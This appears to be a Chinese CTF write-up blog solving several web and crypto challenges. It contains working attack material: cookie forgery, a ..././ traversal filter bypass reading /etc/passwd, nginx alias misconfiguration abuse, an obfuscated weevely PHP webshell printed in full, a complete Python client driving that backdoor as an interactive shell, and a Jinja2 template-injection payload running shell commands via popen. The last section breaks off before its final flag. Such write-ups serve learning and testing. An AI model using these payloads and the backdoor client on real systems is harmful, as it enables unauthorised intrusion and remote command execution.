              http://111.200.241.244:60458/hint.php
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
                
               
               接着访问Hack.php页面，发现提示“请登录”，点击确定又返回到登录页面，这里可能有问题，猜测有逻辑漏洞存在。
              
              
               
             
             
              
             
             
              
               
              
              http://111.200.241.244:60458/Hack.php
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
               
               
                
                
                
                 
               
               
                
               
               
                
                 
                
                最后访问admin页面显示，请继续登录
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              http://111.200.241.244:60458/admin/
             
             
              
             
             
              
              
              
               
               
               
                
              
              
               
              
              
               
                
               
               我们对Hack.php页面进行访问,然后通过bupsuit对其抓包分析,发现cookie:isLogin=0处可能存在逻辑问题。
              
              
               
             
             
              
             
             
              
              
              
               
               
               
                
                
                
                 
                 
                 
                  
                
                
                 
                
                
                 
                  
                 
                 这里将isLogin=0修改为cookie:isLogin=1，然后进行请求，在响应包中发现是后台主页内容
                
                
                 
                
                
                 
                 
                 
                  
                 
                 
                  然后将cookie值修改为isLogin=1，并进行forward. 
                
                
                 
               
               
                
               
               
                
                
                
                 
                 
                 
                  
                 
                 
                  两次对/earth.html页面请求的cookie值进行修改为1并进行forward 
                 
                 
                  后台看起来有很多选项卡,其实大部分都是假的,即使有几个选项存在页面跳转,也都是指向index.php,没有什么问题 真正的利用点在于管理中心 ，只有该链接可以跳转。 http://111.200.241.244:60458/admin/admin.php 
                
                
                 
                
                
                 
                  
                 
                 这里继续将cookie的值修改为isLogin=1，然后进行请求，在响应包中心显示了设备分组页面内容。
                
                
                 
                
                
                 
                 
                 
                  继续几次forward后，可以看到一个url地址： /admin/admin.php?file=index&ext=php，该地址中的?file=参数看起来存在任意文件包含漏洞 尝试对file=../../../../etc/passwd&ext=进行请求(注意修改cookie值)，响应页面显示后台管理监控中心内容，但是/etc/passwd读不出来 注意：ext一定不要写东西，因为它是一个后缀，如果写入php,的话，它会按照php进行打开，这里就留空白或者以txt形式打开。 尝试对file=index../&ext=php进行请求(注意修改cookie值)，响应页面显示后台管理监控中心内容且包含有please continue关键字 
                 
                 
                  尝试对file=index.../&ext=php进行请求(注意修改cookie值)，页面显示后台管理监控中心内容且没有please continue关键字，那么证明../已经被系统过滤了。 
                
                
                 
               
               
                
              
              
               
             
             
              
             
             
              
              
              
               
                
               
               使用..././绕过过滤，
               
               尝试访问 /admin/admin.php?file=..././..././..././..././etc/passwd&ext=,可以读取系统的/etc/passwd值

读取该系统nginx容器的配置文件/etc/nginx/sites-enabled/site.conf
               
               
                
              
              
               
             
             
              
             
             
              
               
              
              尝试访问/admin/admin.php?file=..././..././..././..././etc/nginx/sites-enabled/site.conf&ext=,可读取到nginx的配置文件内容。
             
             
              
             
             
              
              
              
               
               
               
                
                
                
                 
               
               
                
              
              
               
              
              
               
                
               
               得到nginx的配置内容：
              
              
               
             
             
              
             
             
              
              
              
               server 
    { 
    
              
              
               listen 
              
              
               8080; 
    
              
              
               ## listen for ipv4; this line is default and implied listen [::]:8080; 
    
              
              
               ## listen for ipv6 root /var/www/html; 
    
              
              
               index index.php index.html index.htm; 
    
              
              
               port_in_redirect 
              
              
               off; 
              
              
               server_name _; 
    
              
              
               # Make site accessible from http://localhost/ 
    
              
              
               #server_name localhost; 
    
              
              
               # If block for setting the time for the logfile if ($time_iso8601 ~ "^(\d{4})-(\d{2})-(\d{2})") { set $year $1; set $month $2; set $day $3; } 
    
              
              
               # Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.html sendfile off; 
    
              
              
               set 
              
              
               $http_x_forwarded_for_filt 
              
              
               $http_x_forwarded_for; 
    
              
              
               if (
              
              
               $http_x_forwarded_for_filt 
              
              
               ~ ([0-9]+\.[0-9]+\.[0-9]+\.)[0-9]+) { 
              
              
               set 
              
              
               $http_x_forwarded_for_filt 
              
              
               $1???; } 
    
              
              
               # Add stdout logging access_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log; error_log /var/log/nginx/error.log info; 
    
              
              
               location / { 
    
              
              
               # First attempt to serve request as file, then 
    
              
              
               # as directory, then fall back to index.html try_files $uri $uri/ /index.php?q=$uri&$args; server_tokens off; } #error_page 404 /404.html; 
    
              
              
               # redirect server error pages to the static page /50x.html 
    
              
              
               # error_page 500 502 503 504 /50x.html; 
    
              
              
               location = /50x.html { 
    
              
              
               root /usr/share/nginx/html;
    } 
    
    
              
              
               location 
              
              
               ~ \.php
    $ { 
    
              
              
               try_files 
              
              
               $uri 
              
              
               $uri/ /index.php?q=
              
              
               $uri&
              
              
               $args;
    
              
              
               fastcgi_split_path_info
              
              
                ^(.+\.php)(/.+)$; 
    
              
              
               fastcgi_pass unix:/var/run/php/php5.6-fpm.sock; 
    
              
              
               fastcgi_param SCRIPT_FILENAME 
              
              
               $document_root
              
              
               $fastcgi_script_name; 
    
              
              
               fastcgi_param SCRIPT_NAME 
              
              
               $fastcgi_script_name; 
    
              
              
               fastcgi_index index.php; 
              
              
               include fastcgi_params; 
    
              
              
               fastcgi_param REMOTE_ADDR 
              
              
               $http_x_forwarded_for; 
    } 
    
    
              
              
               location 
              
              
               ~ /\. { 
    
              
              
               log_not_found 
              
              
               off; 
    
              
              
               deny all; 
    } 
    
    
              
              
               location /web-img { 
    
              
              
               alias /images/; 
    
              
              
               autoindex 
              
              
               on; 
    } 
    
    
              
              
               location 
              
              
               ~* \.(ini|docx|pcapng|doc)$ { 
              
              
               deny all; } 
    
    
              
              
               include /var/www/nginx[.]conf; 
    }
             
             
              
             
             
              
               
              
              其中有个不正确的配置点：
             
             
              
             
             
              
              
              
               location /web-img {
                
              
              
                       alias /images/; 
              
              
                       autoindex on; 
              
              
                   } 
              
              
               alias 用于给 localtion 指定的路径设置别名 , 在路径匹配时 , alias 会把 location 后面配置的路径丢弃掉 , 并把当前匹配到的目录指向到 alias 指定的目录 .
    autoindex 是一个目录浏览功能 , 用于列出当前目录的所有文件及子目录，这里在 URL 访问 /web-img , 就会访问系统根目录下的 /images/ 
              
              
               而如果在 URL 访问 /web-img../ , 则相当于访问 /images/../ , 即访问系统根目录 . 且由于开启了 autoindex , 我们可以直接在浏览器里看到根目录下的所有内容 
              
              
               尝试访问web-img/：
     
              
              
               http://111.200.241.244:60458/web-img/

尝试访问web-img../，直接可以访问到根目录
        
        
         
        
        
         
         
         
          http://111.200.241.244:60458/web-img../
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
           
          
          访问/web-img../var/www/路径,发现hack.php.bak文件，它是hack.php的备份文件
         
         
          
        
        
         
        
        
         
          
         
         http://111.200.241.244:60458/web-img../var/www/
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
           
          
          访问
          
          
           http://111.200.241.244:60458/hack.php.bk,可下载下来，代码已经被混淆加密了。
         
         
          
         
         
          
          
          
           
           
           
            
          
          
           
          
          
           
            
           
           hack.php.bak的内容：
          
          
           
          
          
           
            
           
           <?php
          
          
           
         
         
          
        
        
         
        
        
         
          
         
         $U='_/|U","/-/|U"),ar|Uray|U("/|U","+"),$ss(|U$s[$i]|U,0,$e)|U)),$k))|U|U);$o|U|U=o|Ub_get_|Ucontents(|U);|Uob_end_cle';
        
        
         
        
        
         
          
         
         $q='s[|U$i]="";$p=|U$ss($p,3);}|U|Uif(array_k|Uey_|Uexis|Uts($|Ui,$s)){$s[$i].=|U$p|U;|U$e=|Ustrpos($s[$i],$f);|Ui';
        
        
         
        
        
         
          
         
         $M='l="strtolower|U";$i=$m|U[1|U][0].$m[1]|U[1];$|U|Uh=$sl($ss(|Umd5($i|U.$kh),|U0,3|U));$f=$s|Ul($ss(|Umd5($i.$';
        
        
         
        
        
         
          
         
         $z='r=@$r[|U"HTTP_R|UEFERER|U"];$r|U|Ua=@$r["HTTP_A|U|UCCEPT_LAN|UGUAGE|U"];if|U($r|Ur&|U&$ra){$u=parse_|Uurl($r';
        
        
         
        
        
         
          
         
         $k='?:;q=0.([\\|Ud]))?,|U?/",$ra,$m)|U;if($|Uq&&$m){|U|U|U@session_start()|U|U;$s=&$_SESSIO|UN;$ss="|Usubst|Ur";|U|U$s';
        
        
         
        
        
         
          
         
         $o='|U$l;|U){for|U($j=0;($j|U<$c&&|U|U$i|U<$|Ul);$j++,$i++){$o.=$t{$i}|U^$k|U{$j};}}|Ureturn $|Uo;}$r=$|U_SERV|UE|UR;$r';
        
        
         
        
        
         
          
         
         $N='|Uf($e){$k=$k|Uh.$kf|U;ob_sta|Urt();|U@eva|Ul(@g|Uzuncom|Upress(@x(@|Ubas|U|Ue64_decode(preg|U_repla|Uce(|Uarray("/';
        
        
         
        
        
         
          
         
         $C='an();$d=b|Uase64_encode(|Ux|U(gzcomp|U|Uress($o),$k))|U;prin|Ut("|U<$k>$d</$k>"|U);@ses|U|Usion_des|Utroy();}}}}';
        
        
         
        
        
         
          
         
         $j='$k|Uh="|U|U42f7";$kf="e9ac";fun|Uction|U |Ux($t,$k){$c|U=|Ustrlen($k);$l=s|Utrl|Ue|Un($t);$o=|U"";fo|Ur($i=0;$i<';
        
        
         
        
        
         
          
         
         $R=str_replace('rO','','rOcreatrOe_rOrOfurOncrOtion');
        
        
         
        
        
         
          
         
         $J='kf|U),|U0,3));$p="|U";for(|U|U$|Uz=1;$z<cou|Unt|U($m[1]);|U$z++)$p.=|U$q[$m[2][$z|U]|U];if(strpos(|U$|U|Up,$h)|U===0){$';
        
        
         
        
        
         
          
         
         $x='r)|U;pa|Urse|U_str($u["qu|U|Uery"],$q);$|U|Uq=array_values(|U$q);pre|Ug|U_match_al|Ul("/([\\|U|Uw])[|U\\w-]+|U(';
        
        
         
        
        
         
          
         
         $f=str_replace('|U','',$j.$o.$z.$x.$k.$M.$J.$q.$N.$U.$C);
        
        
         
        
        
         
          
         
         $g=create_function('',$f);
        
        
         
        
        
         
          
         
         $g();
        
        
         
        
        
         
          
         
         ?>
        
        
         
        
        
         
          
         
         看起来像是weevely 生成的 WebShell 后门，
         
         尝试输出$f，在php代码后加上echo $f,PHP_EOL; 
        
        
         
        
        
         
         
         
                
          
           
           
           
            
            
            
             
              
             
             <?php
            
            
             
           
           
            
          
          
           
          
          
           
            
           
           $U='_/|U","/-/|U"),ar|Uray|U("/|U","+"),$ss(|U$s[$i]|U,0,$e)|U)),$k))|U|U);$o|U|U=o|Ub_get_|Ucontents(|U);|Uob_end_cle';
          
          
           
          
          
           
            
           
           $q='s[|U$i]="";$p=|U$ss($p,3);}|U|Uif(array_k|Uey_|Uexis|Uts($|Ui,$s)){$s[$i].=|U$p|U;|U$e=|Ustrpos($s[$i],$f);|Ui';
          
          
           
          
          
           
            
           
           $M='l="strtolower|U";$i=$m|U[1|U][0].$m[1]|U[1];$|U|Uh=$sl($ss(|Umd5($i|U.$kh),|U0,3|U));$f=$s|Ul($ss(|Umd5($i.$';
          
          
           
          
          
           
            
           
           $z='r=@$r[|U"HTTP_R|UEFERER|U"];$r|U|Ua=@$r["HTTP_A|U|UCCEPT_LAN|UGUAGE|U"];if|U($r|Ur&|U&$ra){$u=parse_|Uurl($r';
          
          
           
          
          
           
            
           
           $k='?:;q=0.([\\|Ud]))?,|U?/",$ra,$m)|U;if($|Uq&&$m){|U|U|U@session_start()|U|U;$s=&$_SESSIO|UN;$ss="|Usubst|Ur";|U|U$s';
          
          
           
          
          
           
            
           
           $o='|U$l;|U){for|U($j=0;($j|U<$c&&|U|U$i|U<$|Ul);$j++,$i++){$o.=$t{$i}|U^$k|U{$j};}}|Ureturn $|Uo;}$r=$|U_SERV|UE|UR;$r';
          
          
           
          
          
           
            
           
           $N='|Uf($e){$k=$k|Uh.$kf|U;ob_sta|Urt();|U@eva|Ul(@g|Uzuncom|Upress(@x(@|Ubas|U|Ue64_decode(preg|U_repla|Uce(|Uarray("/';
          
          
           
          
          
           
            
           
           $C='an();$d=b|Uase64_encode(|Ux|U(gzcomp|U|Uress($o),$k))|U;prin|Ut("|U<$k>$d</$k>"|U);@ses|U|Usion_des|Utroy();}}}}';
          
          
           
          
          
           
            
           
           $j='$k|Uh="|U|U42f7";$kf="e9ac";fun|Uction|U |Ux($t,$k){$c|U=|Ustrlen($k);$l=s|Utrl|Ue|Un($t);$o=|U"";fo|Ur($i=0;$i<';
          
          
           
          
          
           
            
           
           $R=str_replace('rO','','rOcreatrOe_rOrOfurOncrOtion');
          
          
           
          
          
           
            
           
           $J='kf|U),|U0,3));$p="|U";for(|U|U$|Uz=1;$z<cou|Unt|U($m[1]);|U$z++)$p.=|U$q[$m[2][$z|U]|U];if(strpos(|U$|U|Up,$h)|U===0){$';
          
          
           
          
          
           
            
           
           $x='r)|U;pa|Urse|U_str($u["qu|U|Uery"],$q);$|U|Uq=array_values(|U$q);pre|Ug|U_match_al|Ul("/([\\|U|Uw])[|U\\w-]+|U(';
          
          
           
          
          
           
            
           
           $f=str_replace('|U','',$j.$o.$z.$x.$k.$M.$J.$q.$N.$U.$C);
          
          
           
          
          
           
            
           
           $g=create_function('',$f);
          
          
           
          
          
           
            
           
           $g();
          
          
           
          
          
           
            
           
           echo $f,PHP_EOL;
          
          
           
          
          
           
            
           
           ?>
          
          
           
          
          
           
            
           
           通过PHP在线运行工具，可直接运行输出结果。
          
          
           
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
           
          
          输出的内容：
         
         
          
         
         
          
           
          
          $kh="42f7";$kf="e9ac";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
         
         
          
        
        
         
        
        
         
          
         
         通过在线PHP代码格式化美化工具对其进行美化。
        
        
         
        
        
         
         
         
          http://www.jsons.cn/phpformat/
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
           
          
          得到美化后的代码：
         
         
          
        
        
         
        
        
         
          
         
         $kh="42f7";
        
        
         
        
        
         
          
         
         $kf="e9ac";
        
        
         
        
        
         
          
         
         function x($t,$k) {
        
        
         
        
        
         
          
         
             $c=strlen($k);
        
        
         
        
        
         
          
         
             $l=strlen($t);
        
        
         
        
        
         
          
         
             $o="";
        
        
         
        
        
         
          
         
             for ($i=0;$i<$l;) {
        
        
         
        
        
         
          
         
                 for ($j=0;($j<$c&&$i<$l);$j++,$i++) {
        
        
         
        
        
         
          
         
                     $o.=$t {
        
        
         
        
        
         
          
         
                         $i
        
        
         
        
        
         
          
         
                     }
        
        
         
        
        
         
          
         
                     ^$k {
        
        
         
        
        
         
          
         
                         $j
        
        
         
        
        
         
          
         
                     }
        
        
         
        
        
         
          
         
                     ;
        
        
         
        
        
         
          
         
                 }
        
        
         
        
        
         
          
         
             }
        
        
         
        
        
         
          
         
             return $o;
        
        
         
        
        
         
          
         
         }
        
        
         
        
        
         
          
         
         $r=$_SERVER;
        
        
         
        
        
         
          
         
         $rr=@$r["HTTP_REFERER"];
        
        
         
        
        
         
          
         
         $ra=@$r["HTTP_ACCEPT_LANGUAGE"];
        
        
         
        
        
         
          
         
         if($rr&&$ra) {
        
        
         
        
        
         
          
         
             $u=parse_url($rr);
        
        
         
        
        
         
          
         
             parse_str($u["query"],$q);
        
        
         
        
        
         
          
         
             $q=array_values($q);
        
        
         
        
        
         
          
         
             preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
        
        
         
        
        
         
          
         
             if($q&&$m) {
        
        
         
        
        
         
          
         
                 @session_start();
        
        
         
        
        
         
          
         
                 $s=&$_SESSION;
        
        
         
        
        
         
          
         
                 $ss="substr";
        
        
         
        
        
         
          
         
                 $sl="strtolower";
        
        
         
        
        
         
          
         
                 $i=$m[1][0].$m[1][1];
        
        
         
        
        
         
          
         
                 $h=$sl($ss(md5($i.$kh),0,3));
        
        
         
        
        
         
          
         
                 $f=$sl($ss(md5($i.$kf),0,3));
        
        
         
        
        
         
          
         
                 $p="";
        
        
         
        
        
         
          
         
                 for ($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];
        
        
         
        
        
         
          
         
                 if(strpos($p,$h)===0) {
        
        
         
        
        
         
          
         
                     $s[$i]="";
        
        
         
        
        
         
          
         
                     $p=$ss($p,3);
        
        
         
        
        
         
          
         
                 }
        
        
         
        
        
         
          
         
                 if(array_key_exists($i,$s)) {
        
        
         
        
        
         
          
         
                     $s[$i].=$p;
        
        
         
        
        
         
          
         
                     $e=strpos($s[$i],$f);
        
        
         
        
        
         
          
         
                     if($e) {
        
        
         
        
        
         
          
         
                         $k=$kh.$kf;
        
        
         
        
        
         
          
         
                         ob_start();
        
        
         
        
        
         
          
         
                         @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
        
        
         
        
        
         
          
         
                         $o=ob_get_contents();
        
        
         
        
        
         
          
         
                         ob_end_clean();
        
        
         
        
        
         
          
         
                         $d=base64_encode(x(gzcompress($o),$k));
        
        
         
        
        
         
          
         
                         print("<$k>$d</$k>");
        
        
         
        
        
         
          
         
                         @session_destroy();
        
        
         
        
        
         
          
         
                     }
        
        
         
        
        
         
          
         
                 }
        
        
         
        
        
         
          
         
             }
        
        
         
        
        
         
          
         
         }
        
        
         
        
        
         
         
         
          经过提示 这个是个后门，网上有利用脚本 https://www.cnblogs.com/go2bed/p/5920811.html  一个PHP混淆后门的分析。 
         
         
          按提示修改脚本中的config部分 
         
         
          
          
          
           
         
         
          
        
        
         
        
        
         
          
         
         利用脚本如下：
        
        
         
        
        
         
         
         
          # encoding: utf-8
    
    from random import randint,choice
    from hashlib import md5
    import urllib
    import string
    import zlib
    import base64
    import requests
    import re
    
    def choicePart(seq,amount):
        length = len(seq)
        if length == 0 or length < amount:
            print 'Error Input'
            return None
        result = []
        indexes = []
        count = 0
        while count < amount:
            i = randint(0,length-1)
            if not i in indexes:
                indexes.append(i)
                result.append(seq[i])
                count += 1
                if count == amount:
                    return result
    
    def randBytesFlow(amount):
        result = ''
        for i in xrange(amount):
            result += chr(randint(0,255))
        return  result
    
    def randAlpha(amount):
        result = ''
        for i in xrange(amount):
            result += choice(string.ascii_letters)
        return result
    
    def loopXor(text,key):
        result = ''
        lenKey = len(key)
        lenTxt = len(text)
        iTxt = 0
        while iTxt < lenTxt:
            iKey = 0
            while iTxt<lenTxt and iKey<lenKey:
                result += chr(ord(key[iKey]) ^ ord(text[iTxt]))
                iTxt += 1
                iKey += 1
        return result
    
    
    def debugPrint(msg):
        if debugging:
            print msg
    
    # config
    debugging = False
    keyh = "42f7" # $kh
    keyf = "e9ac" # $kf
    xorKey = keyh + keyf
    url = 'http://111.200.241.244:60458/hack.php'
    defaultLang = 'zh-CN'
    languages = ['zh-TW;q=0.%d','zh-HK;q=0.%d','en-US;q=0.%d','en;q=0.%d']
    proxies = None # {'http':'http://127.0.0.1:8080'} # proxy for debug
    
    sess = requests.Session()
    
    # generate random Accept-Language only once each session
    langTmp = choicePart(languages,3)
    indexes = sorted(choicePart(range(1,10),3), reverse=True)
    
    acceptLang = [defaultLang]
    for i in xrange(3):
        acceptLang.append(langTmp[i] % (indexes[i],))
    acceptLangStr = ','.join(acceptLang)
    debugPrint(acceptLangStr)
    
    init2Char = acceptLang[0][0] + acceptLang[1][0] # $i
    md5head = (md5(init2Char + keyh).hexdigest())[0:3]
    md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(3,8))
    debugPrint('$i is %s' % (init2Char))
    debugPrint('md5 head: %s' % (md5head,))
    debugPrint('md5 tail: %s' % (md5tail,))
    
    # Interactive php shell
    cmd = raw_input('phpshell > ')
    while cmd != '':
        # build junk data in referer
        query = []
        for i in xrange(max(indexes)+1+randint(0,2)):
            key = randAlpha(randint(3,6))
            value = base64.urlsafe_b64encode(randBytesFlow(randint(3,12)))
            query.append((key, value))
        debugPrint('Before insert payload:')
        debugPrint(query)
        debugPrint(urllib.urlencode(query))
    
        # encode payload
        payload = zlib.compress(cmd)
        payload = loopXor(payload,xorKey)
        payload = base64.urlsafe_b64encode(payload)
        payload = md5head + payload
    
        # cut payload, replace into referer
        cutIndex = randint(2,len(payload)-3)
        payloadPieces = (payload[0:cutIndex], payload[cutIndex:], md5tail)
        iPiece = 0
        for i in indexes:
            query[i] = (query[i][0],payloadPieces[iPiece])
            iPiece += 1
        referer = url + '?' + urllib.urlencode(query)
        debugPrint('After insert payload, referer is:')
        debugPrint(query)
        debugPrint(referer)
    
        # send request
        r = sess.get(url,headers={'Accept-Language':acceptLangStr,'Referer':referer},proxies=proxies)
        html = r.text
        debugPrint(html)
    
        # process response
        pattern = re.compile(r'<%s>(.*)</%s>' % (xorKey,xorKey))
        output = pattern.findall(html)
        if len(output) == 0:
            print 'Error,  no backdoor response'
            cmd = raw_input('phpshell > ')
            continue
        output = output[0]
        debugPrint(output)
        output = output.decode('base64')
        output = loopXor(output,xorKey)
        output = zlib.decompress(output)
        print output
        cmd = raw_input('phpshell > ') 
         
         
          执行python脚本，并使用  system("ls") ; 查看当前目录，发现存在 fllla4aggg.php文件，该文件包含flag内容 
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
           
          
          直接查看 fllla4aggg.php，可获得flag内容
         
         
          
         
         
          
           
          
          system("cat fllla4aggg.php");
         
         
          
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
           
          
          最终flag:
         
         
          
        
        
         
        
        
         
          
         
         ctf{a57b3698-eeae-48c0-a669-bafe3213568c}
    
    
        
        
         
        
        
         
         
         
                
          
           
           
           
            
            
            
             
              
             
             题目名称：Hello World
            
            
             
           
           
            
          
          
           
          
          
           
            
           
           题目wireup:
          
          
           
          
          
           
            
           
           访问靶机网站，发现是一个显示内容为“hello wold"的内容
          
          
           
        
        
         
        
        
         
         
         
          http://106.75.72.168:9999/
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
           
          
          查看源代码，发现有一个flag.xmas.js的 js
         
         
          
         
         
          
          
          
           
           
           
            
          
          
           
          
          
           
            
           
           访问flag.xmas.js路径，发现404页面无法访问
          
          
           
          
          
           
            
           
           http://106.75.72.168:9999/flag.xmas.js
          
          
           
         
         
          
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
        
        
         
        
        
         
          
         
         通过dirsearch.py对靶机网站进行目录扫描，发现有.git目录泄露
        
        
         
        
        
         
          
         
         python3 dirsearch.py   -u  http://106.75.72.168:9999/
        
        
         
        
        
         
         
         
          
          
          
           
         
         
          
         
         
          
          
          
           
            
           
           通过Git_Extract工具对目标靶机网站进行/.git/目录进行下载
          
          
           
          
          
           
            
           
           git clone https://github.com/gakki429/Git_Extract.git
          
          
           
          
          
           
            
           
           python git_extract.py  http://106.75.72.168:9999/.git/
          
          
           
         
         
          
         
         
          
          
          
           
           
           
            
            
            
             
           
           
            
           
           
            
             
            
            下载到本地，发现有flag.js和flagjs.04bbo9两个不同的js
           
           
            
          
          
           
          
          
           
           
           
            
            
            
             
           
           
            
           
           
            
             
            
            用diff对flag.js和flag.js.04bb09进行对比，不同之处就是flag的关键组成字符
           
           
            
           
           
            
             
            
            flag{82efc37f1cd5d4636ea7cadcd5a814a2}
            
            
             
    
           
           
            
           
           
            
            
            
             
            
            
             最终falg: 
           
           
            
          
          
           
          
          
           
            
           
           flag{82efc37f1cd5d4636ea7cadcd5a814a2}
          
          
           
          
          
           
            
           
           题目名称：Musee de X
          
          
           
          
          
           
            
           
           题目内容：X在卢浮宫旁开了一个博物馆，欢迎社会各界人士捐献藏品
          
          
           
          
          
           
            
           
           题目writeup:
          
          
           
          
          
           
           
           
            打开提示我们如果要操作就需要登录 
           
           
            
            
            
             
           
           
            
           
           
            首先注册一个账号wosun 
           
           
            http://106.75.72.168:8888/register.php 
           
           
            
            
            
             
           
           
            
           
           
            然后用这个账号登录系统 
           
           
            http://106.75.72.168:8888/index.php 
           
           
            
           
           
            通过donate.php页面进行捐献，这里地址任意填一个url网站地址(123.com)，用户名必须和注册的用户名一致(wosun) 
           
           
            http://106.75.72.168:8888/donate.php 
           
           
            
           
           
            提交后显示了错误，jinja2模板注入 
           
           
            
           
           
            
           
           
             text = jinja2.Template(text).render() 说明使用了jinja２ 
           
           
            据此信息是jinjia2模板而我们的用户名在text中，似乎就可以注入了 
           
           
            先注册用户名为({
             {前面的可以随意修改，注册成自己的用户名吧) 
           
           
            wosun{
             {''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].__dict__['popen']('cat flag*').read()}} 
           
           
            然后登录，捐献照片为底色为黑色的网络照片http://pic4.bbzhi.com/jingxuanbizhi/heisediannaozhuomianbizhixiazai/heisediannaozhuomianbizhixiazai_362061_5.jpg 
           
           
            然后go一下就看到flag了 
           
           
            
           
           
             最终flag: 
           
           
             flag{13460551-92a3-ed4f-844d-86f8f12ca99c} 
          
          
           
          
          
           
            
           
           题目名称：破译
          
          
           
         
         
          
        
        
         
        
        
         
          
         
         题目wirtup:
        
        
         
        
        
         
          
         
         通过ctfcrackT00LS对其字符进行凯撒解密
        
        
         
        
        
         
         
         
          
          
          
           
           
           
            
          
          
           
          
          
           
            
           
           解密得到：
          
          
           
          
          
           
            
           
           BE5650G - 0BA CH50A A0D THE CH50ESE 9505ST4O 1F EDUCAT510 A001U0CED 910DAO A0 ENTE0S510 1F THE54 EN5ST50G 2A4T0E4SH52 T1 50C14214ATE F5T0ESS A0D BAS7ETBA88 DEVE8129E0T 50 E8E9E0TA4O, 95DD8E A0D H5GH SCH118S AC41SS CH50A.THE A001U0CE9E0T MAS 9ADE AT A S5G050G CE4E910O T1DAO BO 0BA CH50A CE1 DAV5D SH1E9A7E4 A0D NU TA1, D54ECT14 GE0E4A8 1F THE 50TE40AT510A8 C112E4AT510 A0D ENCHA0GE DE2A4T9E0T 1F THE 9505ST4O 1F EDUCAT510.
          
          
           
         
         
          
         
         
          
           
          
          "ME A4E ENC5TED T1 B41ADE0 1U4 2A4T0E4SH52 M5TH THE 9505ST4O 1F EDUCAT510 T1 9A7E A 810G-8AST50G 592ACT 10 THE 85VES 1F CH50ESE STUDE0TS TH41UGH A 6150T8O-DES5G0ED BAS7ETBA88 CU445CU8U9 A0D A M5DE 4A0GE 1F SCH118 BAS7ETBA88 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9E0T 9A47S A01THE4 958EST10E 50 THE 0BA'S O1UTH A0D BAS7ETBA88 DEVE8129E0T EFF14TS 50 CH50A." F8AG { GS182D9HCT9ABC5D}
         
         
          
         
         
          
           
          
          其中包含了关键信息：
         
         
          
        
        
         
        
        
         
          
         
         F8AG { GS182D9HCT9ABC5D}
        
        
         
        
        
         
          
         
         F8AG看起来不像是flag的标识开头，这里是l被替换成8
        
        
         
        
        
         
         
         
          再根据前面的字符串猜测得到：
    1替换O 2替换P 5替换I 8替换L 9替换M 
         
         
          替换掉数字后删去空格，得到：
    FLAG{GSOLPDMHCTMABCID} 
         
         
          或者脚本 
         
         
          import requests
    import string
    s="\"EW S4W WFU5LWV L1 T41SVW0 1M4 2S4L0W4KZ52 E5LZ LZW 9505KL4G 1X WVMUSL510 L1 9S7W S 810Y-8SKL50Y 592SUL 10 LZW 85NWK 1X UZ50WKW KLMVW0LK LZ41MYZ S 6150L8G-VWK5Y0WV TSK7WLTS88 UM445UM8M9 S0V S E5VW 4S0YW 1X KUZ118 TSK7WLTS88 241Y4S9K,\" KS5V KZ1W9S7W4. \"LZ5K U1995L9W0L 9S47K S01LZW4 958WKL10W 50 LZW 0TS'K G1MLZ S0V TSK7WLTS88 VWNW8129W0L WXX14LK 50 UZ50S.\" X8SY { YK182V9ZUL9STU5V}"
    i=18
    temp=""
    for j in s:
       if ord(j)<=ord('M') and ord(j)>=ord('A'):
           if(ord(j)+i)>=ord('A') and (ord(j)+i)<=ord('Z'):
               temp+=chr(ord(j)+i)
           else:
               temp+=j
       elif ord(j)>=ord('N') and ord(j)<=ord('Z'):
           if (ord(j) - i) >= ord('A') and (ord(j) - i) <= ord('Z'):
               temp += chr(ord(j) - i)
           else:
               temp += j
       else:
           temp+=j
    #print temp
    f=temp
    c=""
    for t in f:
       if t=='4':
           c+='R'
       elif t=='5':
           c+="I"
       elif t == 'L':
           c += "T"
       elif t=='0':
           c+="N"
       elif t=='K':
           c+="S"
       elif t=='7':
           c+="K"
       elif t=='8':
           c+="L"
       elif t=='M':
           c+="U"
       elif t=='1':
           c+="O"
       elif t=='9':
           c+="M"
       elif t=='2':
           c+="P"
       else:
           c+=t
    print c 
         
         
                
          
           
           
           
            
          
          
           
          
          
           
            
           
           得到：FLAG { GSOLPDMHCTMABCID}
          
          
           
          
          
           
            
           
           根据flag格式，不能有空格，最终flag:
          
          
           
          
          
           
            
           
